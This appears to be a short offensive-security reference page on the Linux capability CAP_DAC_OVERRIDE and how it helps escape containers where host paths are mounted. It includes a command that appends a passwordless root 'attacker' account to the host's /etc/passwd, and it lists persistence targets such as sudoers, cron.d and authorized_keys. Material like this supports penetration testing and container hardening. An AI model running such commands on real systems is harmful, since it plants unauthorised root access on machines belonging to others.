CAP_DAC_OVERRIDE

CAP_DAC_OVERRIDE bypasses file write permission checks. It does not by itself cross the mount namespace, but wherever a host path is reachable (a bind mount, a mounted host device, /proc/<pid>/root with host /proc), it turns a read-only-by-permission target into a writable one.

bash
capsh --print | grep -q cap_dac_override && echo have
# With any host path reachable, write despite ownership/mode
echo 'attacker:x:0:0::/root:/bin/sh' >> /host/etc/passwd

Exploitation notes#

  • The capability is a force-multiplier for mounts: combine it with a Host path mount or a mounted host device to write files you could otherwise only read.
  • Useful targets are cron.d, passwd, sudoers, and authorized_keys, or flipping a host binary to setuid.
  • For reads rather than writes, see CAP_DAC_READ_SEARCH.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more